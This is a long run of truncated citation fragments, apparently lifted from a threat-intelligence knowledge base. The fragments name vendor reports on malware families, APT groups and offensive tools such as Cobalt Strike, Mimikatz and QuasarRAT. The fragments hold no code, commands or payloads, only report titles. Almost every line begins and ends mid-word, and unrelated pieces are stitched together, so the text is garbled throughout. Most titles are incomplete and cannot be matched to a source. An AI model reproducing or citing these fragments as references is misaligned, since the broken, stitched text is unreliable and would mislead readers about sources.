n June 2020),(Citation: group-ib_redcurl1),(Citation: PWC Cloud Hopper April 2017),(Citation: F-Secure Cosmicduke),(Citation: Cybersecurit
ender FunnyDream Campaign November 2020),(Citation: Kaspersky Transparent Tribe August 2020),(Citation: FireEye APT30),(Citation: KI
c Pikabot 2024),(Citation: NCCGroup RokRat Nov 2018),(Citation: TrendMicro RaspberryRobin 2022),(Citation: Malwarebytes Saint Bot Ap
ONIC April 2024),(Citation: CERT-EE Gamaredon January 2021),(Citation: Cybereason INC Ransomware November 2023),(Citation: Deep Ins
Feb 2020),(Citation: Medium Metamorfo Apr 2020),(Citation: Logpoint Pikabot 2024),(Citation: Secureworks DarkTortilla Aug 2022),(Citatio
D 2023),(Citation: Kubernetes Cloud Native Security)

SPOT Implant January 2021),(Citation: Recorded Future Turla Infra 2020),(Citation: Lumen Versa 2024),(Citation: ESET Dukes October 2019

n: Novetta Blockbuster Destructive Malware),(Citation: Medium S2W WhisperGate January 2022),(Citation: SentinelOne Agrius 2021),(Cita
rGate January 2022),(Citation: ESET Telebots June 2017),(Citation: Crowdstrike WhisperGate January 2022),(Citation: Cybereason Whisper
020),(Citation: Microsoft Deep Dive Solorigate January 2021),(Citation: Palo Alto Brute Ratel July 2022),(Citation: Nltest Manual),(Citation: T

020),(Citation: Microsoft Prestige ransomware October 2022),(Citation: Wald0 Guide to GPOs),(Citation: Microsoft GPO Security Filtering),

easures March 2017),(Citation: Red Canary SocGholish March 2024),(Citation: McAfee Sodinokibi October 2019),(Citation: RATANKBA),(Cit
0),(Citation: ESET Operation Spalax Jan 2021),(Citation: Mandiant APT29 Eye Spy Email Nov 22),(Citation: Kaspersky Tomiris Sep 2021),(Cit

ber 2019),(Citation: Accenture Lyceum Targets November 2021),(Citation: ESET Ebury Oct 2017),(Citation: ESET Sednit 2017 Activity),(Cita

change Mail Forwarding 2),(Citation: TrustedSec OOB Communications)

idden Inbox Rules),(Citation: Microsoft Get-InboxRule),(Citation: TrustedSec OOB Communications)
ot December 2020),(Citation: group-ib_redcurl1),(Citation: Talos Smoke Loader July 2018),(Citation: FireEye CARBANAK June 2017),(Citatio
tation: ESET LightNeuron May 2019),(Citation: Cybereason Valak May 2020),(Citation: Cybersecurity Advisory GRU Brute Force Campaign J
et 2023),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: Gh0stRAT ATT March 2019),(Citation: Secureworks IRON HEMLOCK Pro
ow Your Enemy FIN8 Aug 2016),(Citation: Microsoft PLATINUM April 2016),(Citation: Segurança Informática URSA Sophisticated Loader 20
: MSTIC FoggyWeb September 2021),(Citation: GitHub QuasarRAT),(Citation: Mandiant Pulse Secure Zero-Day April 2021),(Citation: ESET S

XOTIC LILY March 2022),(Citation: Proofpoint TA453 March 2021),(Citation: Proofpoint TA427 April 2024),(Citation: Bitdefender FunnyDre
tion: Microsoft Moonstone Sleet 2024),(Citation: ClearSky Pay2Kitten December 2020),(Citation: US District Court Indictment GRU Unit 744

ft Windows Defender Application Control),(Citation: Corio 2008),(Citation: TechNet Applocker vs SRP),(Citation: TechNet RDP Gateway),(C
o Networks BBSRAT),(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: Bitdefender FunnyDream Campaign November 2020),

arch 2018),(Citation: FireEye APT33 Guardrail),(Citation: Bitdefender Sardonic Aug 2021),(Citation: Rancor WMI),(Citation: Microsoft PLATIN
tion: McAfee Lazarus Nov 2020),(Citation: HP RaspberryRobin 2024),(Citation: MSTIC Nobelium Toolset May 2021),(Citation: SentinelOne

son Chaes Nov 2020),(Citation: Cisco Talos Intelligence Group),(Citation: Microsoft Azure Storage Security, 2019),(Citation: Amazon AWS T

n: Talos Agent Tesla Oct 2018),(Citation: Medium KONNI Jan 2020),(Citation: SentinelLabs Agent Tesla Aug 2020),(Citation: Palo Alto OilRig
cember 2020),(Citation: wardle evilquest partii),(Citation: Check Point Warzone Feb 2020),(Citation: Kaspersky MoleRATs April 2019),(Cita

ebruary 2020),(Citation: FireEye Periscope March 2018),(Citation: ESET Crutch December 2020),(Citation: TrendMicro Confucius APT Feb 2

tting Edge Part 2 January 2024),(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021),(Citation: Mandiant FIN13 Aug 202
Citation: Kaspersky CactusPete Aug 2020),(Citation: Trend Micro IXESHE 2012),(Citation: FireEye Clandestine Wolf),(Citation: Kaspersky Clo

2015),(Citation: Unit 42 Siloscape Jun 2021),(Citation: FireEye APT33 Guardrail),(Citation: Cobalt Strike TTPs Dec 2017),(Citation: ESET Sedn
aCry 2017),(Citation: CrowdStrike PIONEER KITTEN August 2020),(Citation: Red Canary Emotet Feb 2019),(Citation: LogRhythm WannaCry)
t FIN5 GrrCON Oct 2016),(Citation: FireEye KEGTAP SINGLEMALT October 2020),(Citation: ESET Telebots June 2017),(Citation: NCC Group L
agon),(Citation: ESET Crutch December 2020),(Citation: Unit42 RDAT July 2020),(Citation: ESET Ebury Oct 2017),(Citation: ESET Sednit Part
e Feb 2020),(Citation: Bitdefender APT28 Dec 2015),(Citation: Medium Metamorfo Apr 2020),(Citation: CrowdStrike Ryuk January 2019),(C

Citation: NCSC-NL COATHANGER Feb 2024),(Citation: Shlayer jamf gatekeeper bypass 2021),(Citation: sentinelone apt32 macOS backdoor

bereason INC Ransomware November 2023),(Citation: Ensilo Darkgate 2018),(Citation: Sygnia Elephant Beetle Jan 2022),(Citation: Mandia
December 2019),
on: NCC Group LAPSUS Apr 2022),
,(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: ClearSky Siamesekitten August 2021),(Citation: Google EX

7 HAFNIUM Mar 2021),(Citation: CISA AR18-352A Quasar RAT December 2018),(Citation: Trusteer Carberp October 2010),(Citation: Talos

ereason Cobalt Kitty 2017),(Citation: CISA AR18-352A Quasar RAT December 2018),(Citation: Morphisec Snip3 May 2021),(Citation: Kaspe

May 2024),(Citation: Cybereason Valak May 2020),(Citation: Ciubotariu 2014),(Citation: Kaspersky Regin),(Citation: Cybereason Cobalt Kitt

osoft CreateProcess),(Citation: Executable Installers are Vulnerable),(Citation: Microsoft Dynamic Link Library Search Order),(Citation: Micr

Web September 2021),(Citation: ESET Sednit Part 3),(Citation: Microsoft Ransomware as a Service),(Citation: ESET Crutch December 2020
ded Future REDDELTA July 2020),(Citation: Cybereason Oceanlotus May 2017),(Citation: Anomali Pirate Panda April 2020),(Citation: FireEy
dened Runtime)

ng),(Citation: Microsoft Dynamic-Link Library Security),(Citation: Vulnerability and Exploit Detector),(Citation: Microsoft Using Software Res
-Link Library Security),(Citation: Vulnerability and Exploit Detector),(Citation: Microsoft Using Software Restriction )
-Link Library Security),(Citation: Vulnerability and Exploit Detector),(Citation: Microsoft Using Software Restriction )

tion: Microsoft Deep Dive Solorigate January 2021),(Citation: Kaspersky ProjectSauron Technical Analysis),(Citation: Checkpoint MosesStaff
orfo Apr 2020),(Citation: Microsoft PLATINUM April 2016),(Citation: Mandiant Cutting Edge Part 2 January 2024),(Citation: FireEye FIN6 Ap

MalwareBytes WoodyRAT Aug 2022),(Citation: MDSec Brute Ratel August 2022),(Citation: Qualys Hermetic Wiper March 2022),(Citation:

tions October 2023),(Citation: Huntress NPPSPY 2022),

rdonic Aug 2021),(Citation: Sandfly BPFDoor 2022),(Citation: Mandiant Cutting Edge Part 2 January 2024),(Citation: Volexity Ivanti Zero-Da
HuntReport 2022),(Citation: Securing bash history)

n: Microsoft Deep Dive Solorigate January 2021),

(Citation: Talos ZxShell Oct 2014),(Citation: SentinelLabs Metador Sept 2022),(Citation: Talos Olympic Destroyer 2018),(Citation: US Distric
ary Panda May 2019),(Citation: Cisco Ukraine Wipers January 2022),(Citation: Sofacy Komplex Trojan),(Citation: Symantec Pasam May 201

2015),(Citation: Novetta Blockbuster Destructive Malware),(Citation: Novetta Blockbuster Loaders),(Citation: FireEye POSHSPY April 2017)

R21-126A FIVEHANDS May 2021),(Citation: Check Point Warzone Feb 2020),(Citation: Bitdefender APT28 Dec 2015),(Citation: Medium Met
October 2019),(Citation: Dragos EKANS),(Citation: Deep Instinct Black Basta August 2022),(Citation: Intel 471 REvil March 2020),(Citation:

7 Oct 2019),(Citation: Elastic Process Injection July 2017),(Citation: Lumen Versa 2024),
roup-ib_redcurl1),(Citation: MacKeeper Bundlore Apr 2019),(Citation: trendmicro xcsset xcode project 2020),(Citation: synack 2016 review
EDHAM June 2021),(Citation: SentinelOne MacMa Nov 2021),(Citation: GitHub QuasarRAT),(Citation: ESET Operation Groundbait),(Citatio

arch 2022),(Citation: Accenture HyperStack October 2020),(Citation: Microsoft DDE Advisory Nov 2017),(Citation: Enigma Reviving DDE Ja
er FunnyDream Campaign November 2020),(Citation: ClearSky MuddyWater June 2019),(Citation: Proofpoint Bumblebee April 2022),(Citati
ET RTM Feb 2017),(Citation: McAfee APT28 DDE2 Nov 2017),(Citation: SentinelOne Valak June 2020),(Citation: Eset Ramsay May 2020),(Cit
22),(Citation: Talos Olympic Destroyer 2018),(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: Secureworks BRONZE

ne 2017),(Citation: Trend Micro Tick November 2019),(Citation: Cybereason Cobalt Kitty 2017),(Citation: Malwarebytes Saint Bot April 202

3),(Citation: Dragos Crashoverride 2018),(Citation: Palo Alto Brute Ratel July 2022),(Citation: McAfee Lazarus Jul 2020),(Citation: file_uploa
t MosesStaff Nov 2021),(Citation: Group IB APT 41 June 2021),(Citation: Mandiant APT1 Appendix),(Citation: Sandfly BPFDoor 2022),(Citati
r 2010),(Citation: Kaspersky Carbanak),(Citation: MSTIC FoggyWeb September 2021),(Citation: Palo Alto Unit 42 OutSteel SaintBot Februa

SA),(Citation: TechNet Least Privilege)

tion: GitHub QuasarRAT),(Citation: FireEye SMOKEDHAM June 2021),(Citation: Checkpoint MosesStaff Nov 2021),(Citation: Check Point Wa

oor),(Citation: Cybereason Bazar July 2020),(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023),(Citation: FireEye
tation: Cisco Talos Bitter Bangladesh May 2022),(Citation: McAfee Maze March 2020),(Citation: US-CERT HOTCROISSANT February 2020),(

FireEye APT41 Aug 2019),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: ESET Industroyer),(Citation: Securelist BlackEnergy No
2022),(Citation: ESET Trickbot Oct 2020),(Citation: Securelist Sofacy Feb 2018),(Citation: Mandiant APT1),(Citation: CISA AA20-239A Beagle
Citation: Kaspersky Regin),(Citation: Leonardo Turla Penquin May 2020),(Citation: GitHub PoshC2),(Citation: FireEye APT28 Hospitality Aug
e Part 2 January 2024),(Citation: Kaspersky Transparent Tribe August 2020),(Citation: FireEye APT30),(Citation: FireEye Operation Double T
Bitdefender StrongPity June 2020),(Citation: US-CERT HARDRAIN March 2018),(Citation: Talos Emotet Jan 2019),(Citation: Palo Alto Moon
dnit Part 2),(Citation: TrendMicro Tonto Team October 2020),(Citation: Kaspersky Poseidon Group),(Citation: Cybereason Oceanlotus May

tion: Symantec MuddyWater Dec 2018),(Citation: ESET Okrum July 2019),(Citation: Tilbury Windows Credentials),(Citation: Microsoft Prote
ikatz),(Citation: Directory Services Internals DPAPI Backup Keys Oct 2015),(Citation: FoxIT Wocao December 2019),(Citation: Microsoft Dee
y 2019),(Citation: AADInternals Documentation),(Citation: FireEye APT33 Guardrail),(Citation: Deply Mimikatz),(Citation: CISA GRU29155 2
n: Cybersecurity Advisory GRU Brute Force Campaign July 2021),(Citation: DOJ GRU Indictment Jul 2018),(Citation: Mandiant FIN13 Aug 202
mware October 2022),(Citation: Joint Cybersecurity Advisory Volt Typhoon June 2023),(Citation: FireEye FIN6 April 2016),(Citation: Impacke

ight Dragon),(Citation: CrowdStrike IceApple May 2022),(Citation: Mandiant Operation Ke3chang November 2014),(Citation: Impacket Too
Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: Mandiant Pulse Secure Zero-Day April 2021),(Citation: S2 Grupo TrickBot Ju
on: Securelist Brazilian Banking Malware July 2020),(Citation: McAfee Maze March 2020),(Citation: Avira Mustang Panda January 2020),(Cit
tion: CrowdStrike Carbon Spider August 2021),(Citation: DFIR Ryuk's Return October 2020),(Citation: Securelist MuddyWater Oct 2018),(Ci

Citation: Palo Alto Brute Ratel July 2022),

ense Emotes Wi-Fi Spreader),(Citation: CISA ComRAT Oct 2020),(Citation: Securelist Dtrack),(Citation: Zscaler Pikabot 2023),(Citation: Tren
2 Emissary Panda May 2019),(Citation: GitHub Sliver C2),(Citation: SentinelOne SocGholish Infrastructure November 2022),(Citation: Trend
Citation: ESET Dukes October 2019),(Citation: ESET Turla Mosquito Jan 2018),(Citation: Secureworks GandCrab and REvil September 2019

Unit42 OilRig Nov 2018),(Citation: FoxIT Wocao December 2019),(Citation: cobaltstrike manual),(Citation: APT3 Adversary Emulation Plan)

7),(Citation: FireEye Clandestine Wolf),(Citation: APT3 Adversary Emulation Plan),(Citation: ClearSky Lazarus Aug 2020),(Citation: Symantec
tation: MalwareBytes Lazarus-Andariel Conceals Code April 2021),(Citation: TrendMicro EarthLusca 2022),(Citation: Volexity PowerDuke N

ovember 2020),(Citation: Kaspersky LuminousMoth July 2021),(Citation: TrendMicro EarthLusca 2022),(Citation: ESET Operation Spalax Jan
ation: FireEye APT19),(Citation: Security Intelligence More Eggs Aug 2019),(Citation: FireEye FIN10 June 2017),(Citation: FireEye FIN6 Apr 2

l Password Filter n.d)

22),(Citation: Sentinel Labs WastedLocker July 2020),(Citation: ESET Operation Groundbait),(Citation: ESET Crutch December 2020),(Citatio
4-038A PRC Critical Infrastructure February 2024),(Citation: GovCERT Carbon May 2016),(Citation: Symantec Buckeye),

spersky Sodin July 2019),(Citation: Trend Micro Black Basta October 2022),(Citation: Mandiant Operation Ke3chang November 2014),(Cita
Basta October 2022),(Citation: Microsoft PLATINUM April 2016),(Citation: Savill 1999),(Citation: FoxIT Wocao December 2019),(Citation: Cy

soft Anti Spoofing),(Citation: ACSC Email Spoofing)

2020),(Citation: AADInternals Documentation),(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: Volexity Pa

May 2022),(Citation: Trend Micro Tick November 2019),(Citation: Securelist Brazilian Banking Malware July 2020),(Citation: Palo Alto Unit
US-CERT Emotet Jul 2018),(Citation: FireEye Know Your Enemy FIN8 Aug 2016),(Citation: FireEye Clandestine Wolf),(Citation: Kaspersky Mo

crosoft Phosphorus Mar 2019),(Citation: ClearSky Kittens Back 3 August 2020),(Citation: Microsoft Moonstone Sleet 2024),(Citation: SANS W

Citation),(Citation: Novetta Blockbuster Destructive Malware),(Citation: Medium S2W WhisperGate January 2022),(Citation: FireEye BOOT

ation: Secureworks DarkTortilla Aug 2022),(Citation: CISA SoreFang July 2016),(Citation: FireEye Hacking Team),(Citation: TrendMicro Trop
Symantec Wiarp May 2012),(Citation: Proofpoint TA2541 February 2022),(Citation: cobaltstrike manual),(Citation: Symantec Dragonfly),(C
y 2021),(Citation: ESET InvisiMole June 2020),(Citation: Symantec FIN8 Jul 2023),
rendMicro Tropic Trooper Mar 2018),(Citation: Lotus Blossom Jun 2015),(Citation: Airbus Derusbi 2015),(Citation: RATANKBA),(Citation: M

2020),(Citation: Microsoft Totbrick Oct 2017),(Citation: emotet_trendmicro_mar2023),(Citation: Morphisec Snip3 May 2021),(Citation: Pal

ctober 2021),(Citation: Mythc Documentation),(Citation: Sygnia Emperor Dragonfly October 2022),(Citation: Group IB Cobalt Aug 2017),(C
on: Crowdstrike TELCO BPO Campaign December 2022),(Citation: US-CERT HARDRAIN March 2018),(Citation: ESET Telebots Dec 2016),(Cita

017),(Citation: Mythc Documentation),(Citation: Bitdefender APT28 Dec 2015),(Citation: Kaspersky Regin),(Citation: Symantec MuddyWate
ROP January 2021),(Citation: BitDefender Chafer May 2020),(Citation: FoxIT Wocao December 2019),(Citation: Kaspersky ToddyCat Check
T Attor Oct 2019),(Citation: SecureWorks WannaCry Analysis),(Citation: CISA GRU29155 2024),(Citation: Checkpoint Dridex Jan 2021),(Citati
eEye APT30),(Citation: Talos Kimsuky Nov 2021),(Citation: McAfee GhostSecret),(Citation: NCC Group WastedLocker June 2020),(Citation: U
evilquest partii),(Citation: Github_SILENTTRINITY),(Citation: Bitdefender Sardonic Aug 2021),(Citation: ESET Gelsemium June 2021),(Citatio
O BPO Campaign December 2022),(Citation: PTSecurity Cobalt Dec 2016),(Citation: Cyble Egregor Oct 2020),(Citation: Group-IB Anunak),(C
asarRAT),(Citation: apt41_dcsocytec_dec2022),(Citation: aptsim),(Citation: Twitter Cglyer Status Update APT3 eml),(Citation: FireEye FIN6
Cylance Cleaver),(Citation: Malwarebytes Emotet Dec 2017),(Citation: Palo Alto Brute Ratel July 2022),(Citation: Microsoft Prestige ransom
2022),(Citation: Mandiant_UNC2165),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: CISA AA20-259A Iran-Based Actor Se
n: ClearSky Siamesekitten August 2021),(Citation: Talos ZxShell Oct 2014),(Citation: CrowdStrike Carbon Spider August 2021),(Citation: Sec
022),(Citation: cobaltstrike manual),(Citation: NSA Spotting)
016),(Citation: FireEye FIN6 Apr 2019),(Citation: Savill 1999),(Citation: cobaltstrike manual),(Citation: ClearSky Lazarus Aug 2020),(Citation:
in 2022),(Citation: Mandiant Suspected Turla Campaign February 2023),(Citation: Eset Ramsay May 2020),(Citation: Fidelis njRAT June 201

: Talos Rocke August 2018),(Citation: Imminent Unit42 Dec2019),(Citation: Sysdig Kinsing November 2020),(Citation: Ensilo Darkgate 2018

HiddenWasp Map 2019),(Citation: Crowdstrike GTR2020 Mar 2020),(Citation: Eset Ramsay May 2020),(Citation: Joint Cybersecurity Adviso

ation: Kifarunix - Task Scheduling in Linux)

eckPoint SpeakUp Feb 2019),(Citation: Aqua Kinsing April 2020),(Citation: ANSSI Sandworm January 2021),(Citation: Leonardo Turla Penqu
po TrickBot June 2017),(Citation: ESET Sednit Part 1),(Citation: FireEye NETWIRE March 2019),(Citation: US-CERT Emotet Jul 2018),(Citation

ET LightNeuron May 2019),(Citation: FireEye MuddyWater Mar 2018),(Citation: FOX-IT May 2016 Mofang),(Citation: ESET Gelsemium June
,(Citation: Amnesty Intl. Ocean Lotus February 2021),(Citation: FireEye NETWIRE March 2019),(Citation: Mandiant APT1 Appendix),(Citatio

roofpoint TA407 September 2019),(Citation: Google EXOTIC LILY March 2022),

22),(Citation: Google Cloud APT41 2024),(Citation: FireEye APT40 March 2019),(Citation: Rapid7 HAFNIUM Mar 2021),(Citation: Symantec T

oofpoint LookBack Malware Aug 2019),(Citation: Sogeti CERT ESEC Babuk March 2021),(Citation: Talos Olympic Destroyer 2018),(Citation:
tion: Prevailion DarkWatchman 2021),(Citation: Trend Micro KillDisk 1),(Citation: FireEye FIN7 Oct 2019),(Citation: ESET Ebury May 2024),(C

Casbaneiro Oct 2019),(Citation: Kaspersky Lyceum October 2021),(Citation: Symantec Inception Framework March 2018),(Citation: Kaspers
ky),(Citation: FireEye Know Your Enemy FIN8 Aug 2016),(Citation: Microsoft PLATINUM April 2016),(Citation: DFIR_Quantum_Ransomwar

May 2021),(Citation: Mandiant UNC3890 Aug 2022),(Citation: Red Canary SocGholish March 2024),(Citation: Gallagher 2015),(Citation: Bit

Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: Microsoft Actinium February 2022),(Citation: ClearSky Siamesekitte

e January 2022),(Citation: Prevailion EvilNum May 2020),(Citation: ESET EvilNum July 2020),(Citation: Leonard TAG 2023),(Citation: Kasper

k 2 Hour Speed Run November 2020),(Citation: Github PowerShell Empire),(Citation: CrowdStrike Carbon Spider August 2021),(Citation: Fir

Bazar July 2020),(Citation: Kaspersky Darkhotel),(Citation: ESET GreyEnergy Oct 2018),(Citation: Securelist Darkhotel Aug 2015),(Citation: P

Ticker 2019),(Citation: objectivesee osx.shlayer apple approved 2020),

tion: Secureworks GandCrab and REvil September 2019),(Citation: Secureworks NotPetya June 2017),(Citation: SolarWinds Sunburst Sunsp
ro Confucius APT Feb 2018),(Citation: Crowdstrike GTR2020 Mar 2020),(Citation: Symantec Shuckworm January 2022),(Citation: Lazarus A
,(Citation: TrendMicro RaspberryRobin 2022),(Citation: CISA AppleJeus Feb 2021),(Citation: Rancor Unit42 June 2018),(Citation: Crowdstrik

motet_trendmicro_mar2023),(Citation: RSA Shell Crew),(Citation: ESET Lazarus Jun 2020),(Citation: Talos Cobalt Group July 2018),(Citation:
(Citation: DFIR_Quantum_Ransomware),(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021),(Citation: ClearSky Lazaru

ation: Bitdefender APT28 Dec 2015),(Citation: CrowdStrike Ryuk January 2019),(Citation: Volexity PowerDuke November 2016),(Citation: S
tation: Ensilo Darkgate 2018),(Citation: Group IB GrimAgent July 2021),(Citation: Korean FSI TA505 2020),(Citation: Malwarebytes Saint Bo
Flagpro new December 2021),(Citation: Arxiv Avaddon Feb 2021),(Citation: Segurança Informática URSA Sophisticated Loader 2020),(Citati
ember 2019),(Citation: Cybereason Bazar July 2020),(Citation: AlienVault Sykipot 2011),(Citation: CME Github September 2018),(Citation:
itation: Mandiant FIN13 Aug 2022),(Citation: Secureworks DarkTortilla Aug 2022),(Citation: Cisco Operation Layover September 2021),(Cita

ation: FireEye NETWIRE March 2019),(Citation: Savill 1999),(Citation: TechNet Netstat),(Citation: Mandiant FIN13 Aug 2022),(Citation: FOX
esh May 2022),(Citation: ASERT Donot March 2018),(Citation: Secureworks Karagany July 2019),(Citation: FireEye SMOKEDHAM June 2021

ec Orangeworm April 2018),(Citation: Trend Micro Tick November 2019),(Citation: Lotus Blossom Jun 2015),(Citation: RATANKBA),(Citation

,(Citation: Google Cloud APT41 2024),(Citation: Symantec Chafer February 2018),(Citation: Talos Nyetya June 2017),(Citation: Bitdefender
2020),(Citation: Elastic Latrodectus May 2024),(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: Trend Micr
sky CactusPete Aug 2020),(Citation: ClearSky Lazarus Aug 2020),(Citation: Volexity PowerDuke November 2016),(Citation: Kaspersky Trans
visiMole June 2020),(Citation: TrendMicro Ursnif File Dec 2014),(Citation: group-ib_redcurl1),(Citation: Eset Ramsay May 2020),(Citation: K
TA18-074A),(Citation: ESET Gamaredon June 2020),(Citation: Unit 42 Phishery Aug 2018),(Citation: Talos Frankenstein June 2019),(Citatio
o Turla Penquin May 2020),(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023),(Citation: Chronicle Winnti for Lin

ecember 2020),(Citation: MSTIC DEV-0537 Mar 2022),(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: Dist

ntinelLabs Agent Tesla Aug 2020),(Citation: GitHub LaZagne Dec 2018),(Citation: Unit42 OilRig Playbook 2023),(Citation: FireEye APT34 July

n: Anomali Rocke March 2019),(Citation: AADInternals Documentation),(Citation: Microsoft 365 Defender Solorigate),(Citation: Aqua Kins
PowerShell Empire),(Citation: Adsecurity Mimikatz Guide),(Citation: GitHub PoshC2),(Citation: Rostovcev APT41 2021),(Citation: Mandian
y Kerberos and KRBTGT),(Citation: ADSecurity AD Kerberos Attacks)

razilian Banking Malware July 2020),(Citation: Unit 42 KerrDown February 2019),(Citation: Morphisec Snip3 May 2021),(Citation: Palo Alto

NETWIRE March 2019),(Citation: FireEye Know Your Enemy FIN8 Aug 2016),(Citation: FireEye Clandestine Wolf),(Citation: Kaspersky MoleR
ybersecurity Advisory GRU Brute Force Campaign July 2021),(Citation: Visa FIN6 Feb 2019),(Citation: Trend Micro Pawn Storm April 2017),(
n: Mandiant APT29 Microsoft 365 2022),(Citation: Roadtools),(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021),(Cita

itation: Secureworks BRONZE SILHOUETTE May 2023),(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: Vole
Pity June 2020),(Citation: Netscout Stolen Pencil Dec 2018),(Citation: Trend Micro Ransomware Spotlight Play July 2023),(Citation: TrendM
tion: Proofpoint TA505 October 2019),(Citation: Talent-Jump Clambling February 2020),(Citation: GitHub QuasarRAT),(Citation: FireEye Per
bruary 2022 ),(Citation: Medium Metamorfo Apr 2020),(Citation: TrendMicro RaspberryRobin 2022),(Citation: ESET Gelsemium June 2021)
ne 2019),(Citation: Malwarebytes Dyreza November 2015),(Citation: Medium Eli Salem GuLoader April 2021),(Citation: Malwarebytes Rok
,(Citation: Morphisec Snip3 May 2021),(Citation: Palo Alto Brute Ratel July 2022),(Citation: ESET Dukes October 2019),(Citation: HP SVCRea

cember 2022),(Citation: Cybereason Bazar July 2020),(Citation: Medium S2W WhisperGate January 2022),(Citation: Medium Eli Salem GuLo
elebots Dec 2016),(Citation: ESET Telebots June 2017),(Citation: ESET Dukes October 2019),(Citation: F-Secure CozyDuke),(Citation: ESET Tu
7),(Citation: Securelist MiniDuke Feb 2013),(Citation: PaloAlto Patchwork Mar 2018),(Citation: TrendMicro Patchwork Dec 2017),(Citation:

23),(Citation: Group IB APT 41 June 2021),(Citation: DustySky),(Citation: Security Intelligence More Eggs Aug 2019),(Citation: FireEye Know
0),(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: Malwarebytes Konni Aug 2021),(Citation: ESET Sednit Part 3),(Ci

Citation: Baumgartner Naikon 2015),(Citation: GitHub PoshC2),(Citation: Microsoft BlackCat Jun 2022),(Citation: Malwarebytes Kimsuky Ju
Afee Bankshot),(Citation: Microsoft runas),(Citation: Microsoft Create Token),(Citation: Microsoft Replace Process Token)

n: Microsoft FinFisher March 2018),(Citation: Microsoft Albanian Government Attacks September 2022),(Citation: Nicolas Falliere, Liam O

l July 2022),(Citation: NCC Group LAPSUS Apr 2022),(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: ESET Lazarus Jun 2
21),(Citation: Trend Micro Trickbot Nov 2018),(Citation: MSTIC Nobelium Toolset May 2021),(Citation: group-ib_redcurl1),(Citation: ESET T
Analysis),(Citation: FireEye SMOKEDHAM June 2021),(Citation: Mandiant Operation Ke3chang November 2014),(Citation: Checkpoint Mose

tion: Volexity Ocean Lotus November 2020),(Citation: ESET Lazarus Jun 2020),(Citation: Dragos Hexane),(Citation: Microsoft Actinium Febr

arch 2022),(Citation: TrendMicro EarthLusca 2022),(Citation: Microsoft HAFNIUM March 2020),(Citation: Mandiant FIN7 Apr 2022),(Citatio

WinterVivern 2023),(Citation: CISA GRU29155 2024),(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: Chec
Ransom Group August 2023),(Citation: TrendMicro RaspberryRobin 2022),(Citation: HP RaspberryRobin 2024),(Citation: ESET EvasivePand
ation: Mythc Documentation),(Citation: Group IB Cobalt Aug 2017),(Citation: Accenture Lyceum Targets November 2021),(Citation: Cybers
),(Citation: Kaspersky Regin),(Citation: cobaltstrike manual),(Citation: Unit 42 Kazuar May 2017),(Citation: Kaspersky ShadowPad Aug 2017
Analysis),(Citation: Unit42 RDAT July 2020),(Citation: ESET Zebrocy Nov 2018),(Citation: ESET LightNeuron May 2019),(Citation: Microsoft

ang July 2016),(Citation: NCSC APT29 July 2020),(Citation: FireEye HAWKBALL Jun 2019),(Citation: Nicolas Falliere, Liam O Murchu, Eric Chie
5),(Citation: Symantec Catchamas April 2018),(Citation: ATT QakBot April 2021),(Citation: Ensilo Darkgate 2018),(Citation: ESET Attor Oct 2
Operation Ke3chang November 2014),(Citation: FireEye FIN6 April 2016),(Citation: Cybereason Bumblebee August 2022),(Citation: ESET O
RawPOS March 2015),(Citation: FireEye FIN6 April 2016),(Citation: ESET Attor Oct 2019),(Citation: FireEye NETWIRE March 2019),(Citation:
E UNION June 2017),(Citation: ESET InvisiMole June 2020),(Citation: TrendMicro MacOS April 2018),(Citation: Palo Alto Networks BBSRAT)
StellarParticle January 2022),(Citation: Talos Kimsuky Nov 2021),(Citation: LOLBAS Certutil),(Citation: FireEye APT41 Aug 2019),(Citation: D
dMicro DarkComet Sept 2014),(Citation: DigiTrust NanoCore Jan 2017),(Citation: Zscaler Cobian Aug 2017),(Citation: Radware Micropsia Ju
aJakiro 2021 netlab360 analysis),(Citation: Mythc Documentation),(Citation: Huntress NPPSPY 2022),(Citation: Kaspersky TajMahal April 20
022),(Citation: ESET Sednit USBStealer 2014),(Citation: FOX-IT May 2016 Mofang),(Citation: Intezer Doki July 20),(Citation: ESET Ebury May

alt Strike September 2020),(Citation: Intrinsec Egregor Nov 2020),(Citation: Kaspersky Ferocious Kitten Jun 2021),(Citation: Crowdstrike GT

July 2019),(Citation: FireEye SMOKEDHAM June 2021),(Citation: Lastline PlugX Analysis),(Citation: ESET Turla Mosquito May 2018),(Citation

2015),(Citation: Baumgartner Naikon 2015),(Citation: Unit 42 Kazuar May 2017),(Citation: Proofpoint Leviathan Oct 2017),(Citation: FireE

tion: Securelist Remexi Jan 2019),(Citation: NSA MS AppLocker),(Citation: Beechey 2010),(Citation: Windows Commands JPCERT)

ered Spider Advisory November 2023),(Citation: Segurança Informática URSA Sophisticated Loader 2020),(Citation: Securelist Dtrack),(Cita
ual 4.3 November 2020),(Citation: Kaspersky QakBot September 2021),(Citation: Cybereason Chaes Nov 2020),(Citation: IBM IcedID Novem
Hub PoshC2),(Citation: TrendMicro Pawn Storm 2019),(Citation: Kaspersky QakBot September 2021),(Citation: ClearSky Pay2Kitten Decem
(Citation: Mandiant APT29 Microsoft 365 2022),(Citation: ANSSI Sandworm January 2021),(Citation: CME Github September 2018),(Citatio
m Oct 2021),(Citation: Symantec Leafminer July 2018),(Citation: DOJ Iran Indictments March 2018),(Citation: Novetta Blockbuster RATs),(C

on: Talent-Jump Clambling February 2020),(Citation: Symantec Chafer Dec 2015),(Citation: ESET EvasivePanda 2023),(Citation: Symantec C

